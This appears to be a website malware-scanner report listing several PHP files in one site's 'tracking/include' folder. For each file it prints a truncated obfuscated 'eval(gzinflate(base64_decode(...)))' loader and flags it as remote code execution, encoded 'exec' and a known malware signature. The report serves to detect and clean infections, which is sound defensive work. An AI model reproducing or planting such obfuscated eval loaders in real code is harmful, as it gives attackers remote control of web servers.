<?php 'H4sIAAAAAAAEAO0973PbtpKf05n+DzCTKaWLLNu5Jp1KsXOp7ba+i+OM7dy7N2mGQ4uQxYQidSSVxC/P//vtAiCJnxQlJ31978oPtkhiF4vFYnexWIDffvMfBS2KOEuDogzzstcff/vNs4Nvv3maxOl7MsvpdN+bFMXOJEySRZjSJIC7aZzQIfz3SHmzoPteST+VO+w+p8m+V5Q3CS1mlJYe2UFcxSSPF6Vc+F34IeRPPVLkk31vZwfqL+PJsPwYJ3E2nGTznSS+Knb4/btiZ2/4SNwM53E6fFd4B093OA6oA2p5tpgtCHm2usIkTK+X4TW8kp4CGIHrQ5iTSZamdFICU8g+SZdJMpbfzYENN0EcwTuP10kns4w8CC6OLy5Ozl6+8QvkUua/HQMxngwLPAyQJgTNluV1FqfX3pjs7JAsJ16cAnJ80kDkdELjDzQKGGjBK5VRJmFRYs+Vy0J/NVnmOU1LoCSdUvg1wWo/E14ALy8N59Q...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0973PbtpKf05n+DzCTKaWLLNu5Jp1KsXOp7ba+i+OM7dy7N2mGQ4uQxYQidSSVxC/P//vtAiCJnxQlJ31978oPtkhiF4vFYnexWIDffvMfBS2KOEuDogzzstcff/vNs4Nvv3maxOl7MsvpdN+bFMXOJEySRZjSJIC7aZzQIfz3SHmzoPteST+VO+w+p8m+V5Q3CS1mlJYe2UFcxSSPF6Vc+F34IeRPPVLkk31vZwfqL+PJsPwYJ3E2nGTznSS+Knb4/btiZ2/4SNwM53E6fFd4B093OA6oA2p5tpgtCHm2usIkTK+X4TW8kp4CGIHrQ5iTSZamdFICU8g+SZdJMpbfzYENN0EcwTuP10kns4w8CC6OLy5Ozl6+8QvkUua/HQMxngwLPAyQJgTNluV1FqfX3pjs7JAsJ16cAnJ80kDkdELjDzQKGGjBK5VRJmFRYs+...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0973PbtpKf05n+DzCTKaWLLNu5Jp1KsXOp7ba+i+OM7dy7N2mGQ4uQxYQidSSVxC/P//vtAiCJnxQlJ31978oPtkhiF4vFYnexWIDffvMfBS2KOEuDogzzstcff/vNs4Nvv3maxOl7MsvpdN+bFMXOJEySRZjSJIC7aZzQIfz3SHmzoPteST+VO+w+p8m+V5Q3CS1mlJYe2UFcxSSPF6Vc+F34IeRPPVLkk31vZwfqL+PJsPwYJ3E2nGTznSS+Knb4/btiZ2/4SNwM53E6fFd4B093OA6oA2p5tpgtCHm2usIkTK+X4TW8kp4CGIHrQ5iTSZamdFICU8g+SZdJMpbfzYENN0EcwTuP10kns4w8CC6OLy5Ozl6+8QvkUua/HQMxngwLPAyQJgTNluV1FqfX3pjs7JAsJ16cAnJ80kDkdELjDzQKGGjBK5VRJmFRYs+...

Function strrev exec_strrev Line: 3 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php cexE

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/excel_export_company_record.php

Size: 2.08 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1X6XLbNhD+rxm9A4JRI7KmDjuTtJYsJa6P1jONk4mUzjSOhgOTkMWEVwHQRxu/excXSV1O4tY5LO293+5igWaDU86jLPW5IEw47rDZYPSvImLUz9KAOu1CRHE3X+RtyWo2er2jBQ0+o2iOCk4ZijgiYRKlzUY0d1r+5GQyOXtzftHOKUsiZbk9Qwdo1202/mk2EPy8HDcbBzxgUS6QuMvpCAt6K3qfyDXRVDzWgiSmEFH7MEWUsYyhBeEoC4KC0bCropFCN1EaZjfdOAuIAGdohDBQ6K0MGYPMQU8blU5fAk1r0dtIAPNeZtQKL0ErpTfo+BeVfyvIkpykEeVAB25nfEXFYRwfWbKjoQAInFct/9eT6UVbq9xBrk8gAoyePq143A+JoMAaKdaXL8hy6BLHddH/CRF6G1PCKQqyVJBAIF7kecaEhu7rsFzF2SWJUeswCLIiFZMo9OBLIRbT7DNNh5XA9Oz1yYc35ye...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1X6XLbNhD+rxm9A4JRI7KmDjuTtJYsJa6P1jONk4mUzjSOhgOTkMWEVwHQRxu/excXSV1O4tY5LO293+5igWaDU86jLPW5IEw47rDZYPSvImLUz9KAOu1CRHE3X+RtyWo2er2jBQ0+o2iOCk4ZijgiYRKlzUY0d1r+5GQyOXtzftHOKUsiZbk9Qwdo1202/mk2EPy8HDcbBzxgUS6QuMvpCAt6K3qfyDXRVDzWgiSmEFH7MEWUsYyhBeEoC4KC0bCropFCN1EaZjfdOAuIAGdohDBQ6K0MGYPMQU8blU5fAk1r0dtIAPNeZtQKL0ErpTfo+BeVfyvIkpykEeVAB25nfEXFYRwfWbKjoQAInFct/9eT6UVbq9xBrk8gAoyePq143A+JoMAaKdaXL8hy6BLHddH/CRF6G1PCKQqyVJBAIF7kecaEhu7rsFzF2SWJUes...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1X6XLbNhD+rxm9A4JRI7KmDjuTtJYsJa6P1jONk4mUzjSOhgOTkMWEVwHQRxu/excXSV1O4tY5LO293+5igWaDU86jLPW5IEw47rDZYPSvImLUz9KAOu1CRHE3X+RtyWo2er2jBQ0+o2iOCk4ZijgiYRKlzUY0d1r+5GQyOXtzftHOKUsiZbk9Qwdo1202/mk2EPy8HDcbBzxgUS6QuMvpCAt6K3qfyDXRVDzWgiSmEFH7MEWUsYyhBeEoC4KC0bCropFCN1EaZjfdOAuIAGdohDBQ6K0MGYPMQU8blU5fAk1r0dtIAPNeZtQKL0ErpTfo+BeVfyvIkpykEeVAB25nfEXFYRwfWbKjoQAInFct/9eT6UVbq9xBrk8gAoyePq143A+JoMAaKdaXL8hy6BLHddH/CRF6G1PCKQqyVJBAIF7kecaEhu7rsFzF2SWJUes...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/excel_export_record.php

Size: 2.67 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOUZaW/bOPZzAuQ/MNpgLKHykXZnsXXqdjJOOhOgm3ZyLNAmgUBLtK1GlrQkndSdyX/f90gdpCxn287xZYU0lfge332R2dkWTIg4SwMhKZeud7Czzdl/ljFnQZaGzO0sZZz08nneQdDO9l40ISOSsnty9KPCjqfE/WEvOD8+Pz95e3rVyRlfxIpk54a8IPvezjaBZy/MFjlNYyZgOxDpvpwxeZgk43L5dcYvBeOuQWoJ30EcdW6QD0sE+0JSrha1kOyn44urjgAqZHdEHId89129zHB5pJZ/+42Uq+GiXPU88uvO9quXO9tbL0TI41wSucrZyJHsk+x/pHdUrzqIQRMGFuwcpoRxnnEyp4JkYbjkLOqRdwmjgpEwSyUNJRHLPM+47Cmrbr3oazJA5cUrsLXWk32KJUAfUJd+/4iFCeWMiHnGWXdO04jcUR7TScIEuEW5L4ioZEQ9I+Iaqvf3B4MBstpjaWRgmXiswnv...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUZaW/bOPZzAuQ/MNpgLKHykXZnsXXqdjJOOhOgm3ZyLNAmgUBLtK1GlrQkndSdyX/f90gdpCxn287xZYU0lfge332R2dkWTIg4SwMhKZeud7Czzdl/ljFnQZaGzO0sZZz08nneQdDO9l40ISOSsnty9KPCjqfE/WEvOD8+Pz95e3rVyRlfxIpk54a8IPvezjaBZy/MFjlNYyZgOxDpvpwxeZgk43L5dcYvBeOuQWoJ30EcdW6QD0sE+0JSrha1kOyn44urjgAqZHdEHId89129zHB5pJZ/+42Uq+GiXPU88uvO9quXO9tbL0TI41wSucrZyJHsk+x/pHdUrzqIQRMGFuwcpoRxnnEyp4JkYbjkLOqRdwmjgpEwSyUNJRHLPM+47Cmrbr3oazJA5cUrsLXWk32KJUAfUJd+/4iFCeWMiHnGWXdO04jcUR7TScIEuEW...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUZaW/bOPZzAuQ/MNpgLKHykXZnsXXqdjJOOhOgm3ZyLNAmgUBLtK1GlrQkndSdyX/f90gdpCxn287xZYU0lfge332R2dkWTIg4SwMhKZeud7Czzdl/ljFnQZaGzO0sZZz08nneQdDO9l40ISOSsnty9KPCjqfE/WEvOD8+Pz95e3rVyRlfxIpk54a8IPvezjaBZy/MFjlNYyZgOxDpvpwxeZgk43L5dcYvBeOuQWoJ30EcdW6QD0sE+0JSrha1kOyn44urjgAqZHdEHId89129zHB5pJZ/+42Uq+GiXPU88uvO9quXO9tbL0TI41wSucrZyJHsk+x/pHdUrzqIQRMGFuwcpoRxnnEyp4JkYbjkLOqRdwmjgpEwSyUNJRHLPM+47Cmrbr3oazJA5cUrsLXWk32KJUAfUJd+/4iFCeWMiHnGWXdO04jcUR7TScIEuEW...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/fix_inprogress_calls.php

Size: 1.53 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1W70/jOBD9jsT/MBdVm2SPlHLS7Yf22lW2LbucgEKT7umEUDCJ21ob4p7jUNBu//cbO2n6K3Qr3UUCgj3z/N6bsZ3jIzZJuKBBllIRkEcupCVFRu3W8VFKZSDZEw1i9sSk1VBjgv6TMQznSUgtM5Msrs+mMzMPT1PGk2AumKRBGPOUWmq8Fj1CGxI6h96nfGDMXgKWzASfCMwJRJZgAIY5nQmVX4mwjN0IQ2UeH52eqh/wKAU2hmcSZ/iSAksQvA4XY0i4PAESRcBkPQ9nY6tyxTaMSZxS+PED3phv2N+PjwAfzS19m9uJc6bo6dBKcc4ZTi/WBHSnNPwGUz6HmCcTSEPBZhKmJIVHShPArIQlkzq4SaSEMgmpJHFMoxNAWPoTbb+oFeHdO7BSKSRXRbTMhM9NG5wqhjZ02mB9aLz/0LCXmkdY22aTCsFFEPOJZdx1kcA5e7mHoWIgFb+6Uer+/yzaL+sAfm4sKIl...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W70/jOBD9jsT/MBdVm2SPlHLS7Yf22lW2LbucgEKT7umEUDCJ21ob4p7jUNBu//cbO2n6K3Qr3UUCgj3z/N6bsZ3jIzZJuKBBllIRkEcupCVFRu3W8VFKZSDZEw1i9sSk1VBjgv6TMQznSUgtM5Msrs+mMzMPT1PGk2AumKRBGPOUWmq8Fj1CGxI6h96nfGDMXgKWzASfCMwJRJZgAIY5nQmVX4mwjN0IQ2UeH52eqh/wKAU2hmcSZ/iSAksQvA4XY0i4PAESRcBkPQ9nY6tyxTaMSZxS+PED3phv2N+PjwAfzS19m9uJc6bo6dBKcc4ZTi/WBHSnNPwGUz6HmCcTSEPBZhKmJIVHShPArIQlkzq4SaSEMgmpJHFMoxNAWPoTbb+oFeHdO7BSKSRXRbTMhM9NG5wqhjZ02mB9aLz/0LCXmkdY22aTCsFFEPOJZdx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W70/jOBD9jsT/MBdVm2SPlHLS7Yf22lW2LbucgEKT7umEUDCJ21ob4p7jUNBu//cbO2n6K3Qr3UUCgj3z/N6bsZ3jIzZJuKBBllIRkEcupCVFRu3W8VFKZSDZEw1i9sSk1VBjgv6TMQznSUgtM5Msrs+mMzMPT1PGk2AumKRBGPOUWmq8Fj1CGxI6h96nfGDMXgKWzASfCMwJRJZgAIY5nQmVX4mwjN0IQ2UeH52eqh/wKAU2hmcSZ/iSAksQvA4XY0i4PAESRcBkPQ9nY6tyxTaMSZxS+PED3phv2N+PjwAfzS19m9uJc6bo6dBKcc4ZTi/WBHSnNPwGUz6HmCcTSEPBZhKmJIVHShPArIQlkzq4SaSEMgmpJHFMoxNAWPoTbb+oFeHdO7BSKSRXRbTMhM9NG5wqhjZ02mB9aLz/0LCXmkdY22aTCsFFEPOJZdx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/footer.php

Size: 1.35 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAL1X32/bNhB+ngH/DwxrNDIQS3GfBttSBmx9yEsHLO1egkCgREpiTJEqSfnH1v7vPVKyZzfpkAzQ+CSTx+873h15n8ejCeWGZIKlhVKWaRQjLBVejke8CCY0myUls38SHeBzOzyNY7xnBk/HIwTjGRi3Cjg90tky7AWSKfp7PLpJxqMV5RvEaYx77MTtcqjou5VZzqQ3WPG6RFtObRXj+c/XGBmdx5jXpGQmslsuuEqFKlXYyBKjKFlFAORhD1+rm6Zq0NeOpxQqIwJNspYLmsq2zphe9r45u/FowqT333DKMvIvYTrYtU2jtE0Fl+tjrNDbt2iS3r2/u7v9/cP9ZcN0zY3hSl4+JPH8EMmnTGeRPF8+ZMGF0u32LhNUaVbEuLK2WUTRlmXz3p8wVzVGlmhwN8ZpJgi4lxyjfPDakgxCaveCxS7vjSD7BcqEytdLlJF8XWrVSjrz8V6gVovgEHqSHY+ueVlZl4Dp2aZ...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1X32/bNhB+ngH/DwxrNDIQS3GfBttSBmx9yEsHLO1egkCgREpiTJEqSfnH1v7vPVKyZzfpkAzQ+CSTx+873h15n8ejCeWGZIKlhVKWaRQjLBVejke8CCY0myUls38SHeBzOzyNY7xnBk/HIwTjGRi3Cjg90tky7AWSKfp7PLpJxqMV5RvEaYx77MTtcqjou5VZzqQ3WPG6RFtObRXj+c/XGBmdx5jXpGQmslsuuEqFKlXYyBKjKFlFAORhD1+rm6Zq0NeOpxQqIwJNspYLmsq2zphe9r45u/FowqT333DKMvIvYTrYtU2jtE0Fl+tjrNDbt2iS3r2/u7v9/cP9ZcN0zY3hSl4+JPH8EMmnTGeRPF8+ZMGF0u32LhNUaVbEuLK2WUTRlmXz3p8wVzVGlmhwN8ZpJgi4lxyjfPDakgxCaveCxS7vjSD7BcqEytdLlJF...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1X32/bNhB+ngH/DwxrNDIQS3GfBttSBmx9yEsHLO1egkCgREpiTJEqSfnH1v7vPVKyZzfpkAzQ+CSTx+873h15n8ejCeWGZIKlhVKWaRQjLBVejke8CCY0myUls38SHeBzOzyNY7xnBk/HIwTjGRi3Cjg90tky7AWSKfp7PLpJxqMV5RvEaYx77MTtcqjou5VZzqQ3WPG6RFtObRXj+c/XGBmdx5jXpGQmslsuuEqFKlXYyBKjKFlFAORhD1+rm6Zq0NeOpxQqIwJNspYLmsq2zphe9r45u/FowqT333DKMvIvYTrYtU2jtE0Fl+tjrNDbt2iS3r2/u7v9/cP9ZcN0zY3hSl4+JPH8EMmnTGeRPF8+ZMGF0u32LhNUaVbEuLK2WUTRlmXz3p8wVzVGlmhwN8ZpJgi4lxyjfPDakgxCaveCxS7vjSD7BcqEytdLlJF...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/nav.php

Size: 6.45 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEMZX29foZdfXxrKUOk5yzVzqZOKkNzdpRgORkMSaIlgSlONe8t9vFyApkOIDVJzUc3ecPCQCWOwudheLxQK6e2fu8Sn1yI5ne8O7d+7ecWdkz40iJvZ2JhdPLy6evzx/txtHLJy4zu77ffLNN2SjOGLexOZJKUIajw7kx4DOGbk3IrvUmcAfx6We688nDhPU9aLdffLvu3cIPO5MBxeEbBntvn+3i/VZuPuefPxI9HIWLgEHl/tQNCaDDMyjMVJw984JjR2XE9cZWcGC++w1dGoRj/NgjBVPIh6HNiNRaI+sZXDYE8xjsmInhJqd/nddeGsRcR2wkSVh9eSLHjT/F7Ql05BfAUuIw1lEfC5IFAcBDwURC0ZU5wByyXzRBWx68o3E7eRRsAiIxmM3mgQ84LGYKGL3gRhJB9Jz4rgrEolrD9AIeOQKIPmY0GnEvViwIfHYTByTo+DDkAgeJJ/+6Li...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEMZX29foZdfXxrKUOk5yzVzqZOKkNzdpRgORkMSaIlgSlONe8t9vFyApkOIDVJzUc3ecPCQCWOwudheLxQK6e2fu8Sn1yI5ne8O7d+7ecWdkz40iJvZ2JhdPLy6evzx/txtHLJy4zu77ffLNN2SjOGLexOZJKUIajw7kx4DOGbk3IrvUmcAfx6We688nDhPU9aLdffLvu3cIPO5MBxeEbBntvn+3i/VZuPuefPxI9HIWLgEHl/tQNCaDDMyjMVJw984JjR2XE9cZWcGC++w1dGoRj/NgjBVPIh6HNiNRaI+sZXDYE8xjsmInhJqd/nddeGsRcR2wkSVh9eSLHjT/F7Ql05BfAUuIw1lEfC5IFAcBDwURC0ZU5wByyXzRBWx68o3E7eRRsAiIxmM3mgQ84LGYKGL3gRhJB9Jz4rgrEolrD9AIeOQ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEMZX29foZdfXxrKUOk5yzVzqZOKkNzdpRgORkMSaIlgSlONe8t9vFyApkOIDVJzUc3ecPCQCWOwudheLxQK6e2fu8Sn1yI5ne8O7d+7ecWdkz40iJvZ2JhdPLy6evzx/txtHLJy4zu77ffLNN2SjOGLexOZJKUIajw7kx4DOGbk3IrvUmcAfx6We688nDhPU9aLdffLvu3cIPO5MBxeEbBntvn+3i/VZuPuefPxI9HIWLgEHl/tQNCaDDMyjMVJw984JjR2XE9cZWcGC++w1dGoRj/NgjBVPIh6HNiNRaI+sZXDYE8xjsmInhJqd/nddeGsRcR2wkSVh9eSLHjT/F7Ql05BfAUuIw1lEfC5IFAcBDwURC0ZU5wByyXzRBWx68o3E7eRRsAiIxmM3mgQ84LGYKGL3gRhJB9Jz4rgrEolrD9AIeOQ...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/parsecsv.lib.php

Size: 8.07 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN08a1cbR5afyTn+D4XCSUuOkMDJzMRg4RAQsWYweAEnmzUMp5FKqEOrW9PdApOY/773Uc/uFmDWs2fPajJYXY9b996676rWs6+efTWMwzwXszDL5c7xL+LPZ18tPfuq+/wZdC3tYN+G7bxe63zXeQEdk6KYbXS7w3QkO5dpehnLzjCddmddGjrMr1fHabY6m8y6BA7/25vH8a0Ypgn0THNRpKKYSJHP5DAaR8OwiNIkF3GUyJFI54VIE3ETXUUzOYrCDZguVoVaVCYd09NJs8suPnV30uk0XM0lIBAWcnR+HcZzmfPSP4U5Qk1oRcBgKGewwFi8jZJL8SaFPweXQS528uu9KJbvkIRMEF/8lacwfgLDOxdxepnP0oKIfrG29tfu2t+6SDWRn2niO5NiGhsGID/T2W0WXU4K0Ry2BEz8m/h7NBVvbyfZhcwuRfP3aPrjH7cjed2JgE+tDu3CO5lNozwHBokoFxOZyYt...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08a1cbR5afyTn+D4XCSUuOkMDJzMRg4RAQsWYweAEnmzUMp5FKqEOrW9PdApOY/773Uc/uFmDWs2fPajJYXY9b996676rWs6+efTWMwzwXszDL5c7xL+LPZ18tPfuq+/wZdC3tYN+G7bxe63zXeQEdk6KYbXS7w3QkO5dpehnLzjCddmddGjrMr1fHabY6m8y6BA7/25vH8a0Ypgn0THNRpKKYSJHP5DAaR8OwiNIkF3GUyJFI54VIE3ETXUUzOYrCDZguVoVaVCYd09NJs8suPnV30uk0XM0lIBAWcnR+HcZzmfPSP4U5Qk1oRcBgKGewwFi8jZJL8SaFPweXQS528uu9KJbvkIRMEF/8lacwfgLDOxdxepnP0oKIfrG29tfu2t+6SDWRn2niO5NiGhsGID/T2W0WXU4K0Ry2BEz8m/h7NBVvbyfZhcwuRfP3aPr...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08a1cbR5afyTn+D4XCSUuOkMDJzMRg4RAQsWYweAEnmzUMp5FKqEOrW9PdApOY/773Uc/uFmDWs2fPajJYXY9b996676rWs6+efTWMwzwXszDL5c7xL+LPZ18tPfuq+/wZdC3tYN+G7bxe63zXeQEdk6KYbXS7w3QkO5dpehnLzjCddmddGjrMr1fHabY6m8y6BA7/25vH8a0Ypgn0THNRpKKYSJHP5DAaR8OwiNIkF3GUyJFI54VIE3ETXUUzOYrCDZguVoVaVCYd09NJs8suPnV30uk0XM0lIBAWcnR+HcZzmfPSP4U5Qk1oRcBgKGewwFi8jZJL8SaFPweXQS528uu9KJbvkIRMEF/8lacwfgLDOxdxepnP0oKIfrG29tfu2t+6SDWRn2niO5NiGhsGID/T2W0WXU4K0Ry2BEz8m/h7NBVvbyfZhcwuRfP3aPr...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/pclzip.lib.php

Size: 38.50 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO29e1cbR9I4/Lefc/Y7jDk+kZTI4hI78domawwi4V0M/Lg4m/X66AzSCCZIM9qZEZhk893frur7bWYkBL7Bs08MUl+qq6urq+v6t/9bXg4eL/jnbzDowflkM0360aQIduPTLMyug8fBv+NJ8CYdTEdRsNZ51ln7261Nvxv3oySPgp/3TpZ3fz7YJZO/jQk4SRG8HoWXUUE+2JieTfMiWFtZ+Tv2OS+KyfPl5aurq87kfNKn0HeSqLg1MCmmsigncIVFnCbBc/woCA76I0BWnAdhcPDLQTBiOCzOwyIYh0l4FgX/3jkIwqx/Hl9GeYf1O0qDYZgFRZQXeZCfp1e0B28WnEVJlIVFNAhOr/kkYRYFWRQOwlOyL6fXbKRf4wS/nExGcZ8CFyaDIC3OIzJ+mo7onNh6K8r7WTzRVnAU0VHHUaf4UGDfUgRjt1/DLImTMzHI8TnBAF87DEFmD8I8T/sxLmIYj8iiYAEJmbq...

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO29e1cbR9I4/Lefc/Y7jDk+kZTI4hI78domawwi4V0M/Lg4m/X66AzSCCZIM9qZEZhk893frur7bWYkBL7Bs08MUl+qq6urq+v6t/9bXg4eL/jnbzDowflkM0360aQIduPTLMyug8fBv+NJ8CYdTEdRsNZ51ln7261Nvxv3oySPgp/3TpZ3fz7YJZO/jQk4SRG8HoWXUUE+2JieTfMiWFtZ+Tv2OS+KyfPl5aurq87kfNKn0HeSqLg1MCmmsigncIVFnCbBc/woCA76I0BWnAdhcPDLQTBiOCzOwyIYh0l4FgX/3jkIwqx/Hl9GeYf1O0qDYZgFRZQXeZCfp1e0B28WnEVJlIVFNAhOr/kkYRYFWRQOwlOyL6fXbKRf4wS/nExGcZ8CFyaDIC3OIzJ+mo7onNh6K8r7WTzRVnAU0VHHUaf4UGDfUgRjt1/DLImTMzH...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO29e1cbR9I4/Lefc/Y7jDk+kZTI4hI78domawwi4V0M/Lg4m/X66AzSCCZIM9qZEZhk893frur7bWYkBL7Bs08MUl+qq6urq+v6t/9bXg4eL/jnbzDowflkM0360aQIduPTLMyug8fBv+NJ8CYdTEdRsNZ51ln7261Nvxv3oySPgp/3TpZ3fz7YJZO/jQk4SRG8HoWXUUE+2JieTfMiWFtZ+Tv2OS+KyfPl5aurq87kfNKn0HeSqLg1MCmmsigncIVFnCbBc/woCA76I0BWnAdhcPDLQTBiOCzOwyIYh0l4FgX/3jkIwqx/Hl9GeYf1O0qDYZgFRZQXeZCfp1e0B28WnEVJlIVFNAhOr/kkYRYFWRQOwlOyL6fXbKRf4wS/nExGcZ8CFyaDIC3OIzJ+mo7onNh6K8r7WTzRVnAU0VHHUaf4UGDfUgRjt1/DLImTMzH...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio.php

Size: 6.02 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAL1ba3PbuJL9PKnKf8CoXCsqK0t2ambrrjN2VpHpWHVlyVePZLIzsy6agiyuKZKXpOx4U/7vexog+ARlW5M7qsSiCKBfaJzuBsHXrxg+3TevxXffDx5C52YVM8NusbcHB/+5//bg8IDN7h3X8dts4Nmd169k30serp0ocnyPORFb8ZBfP7Cb0PJivmizZcg585fMXlnhDW+z2GeW98ACHka+Jwn417HleI53wyxmgzF1j1egFfnL+N4KOUYsmBVFvu1YIMoWvr1Zcy+2YkfRWDouj5gRrzhrTJNhjZZgt+CWyxyPUZtqYvdOvPI3sRwc8igOHZuotdHTdjcLkibpw1xn7UhegoawS0SUNxFvSwokdput/YWzpG8uVA02164Trdps4RD9602MmxHdtLmHoaRW1w9ZxF03JeNADaF/JqzoSPwCsnSc2E5IcL/y19RXDk+1g+2Wm9ADcy4GLnzYUvD+X27HdIfoL33X9e+...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1ba3PbuJL9PKnKf8CoXCsqK0t2ambrrjN2VpHpWHVlyVePZLIzsy6agiyuKZKXpOx4U/7vexog+ARlW5M7qsSiCKBfaJzuBsHXrxg+3TevxXffDx5C52YVM8NusbcHB/+5//bg8IDN7h3X8dts4Nmd169k30serp0ocnyPORFb8ZBfP7Cb0PJivmizZcg585fMXlnhDW+z2GeW98ACHka+Jwn417HleI53wyxmgzF1j1egFfnL+N4KOUYsmBVFvu1YIMoWvr1Zcy+2YkfRWDouj5gRrzhrTJNhjZZgt+CWyxyPUZtqYvdOvPI3sRwc8igOHZuotdHTdjcLkibpw1xn7UhegoawS0SUNxFvSwokdput/YWzpG8uVA02164Trdps4RD9602MmxHdtLmHoaRW1w9ZxF03JeNADaF/JqzoSPwCsnSc2E5IcL/y19RXDk+...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

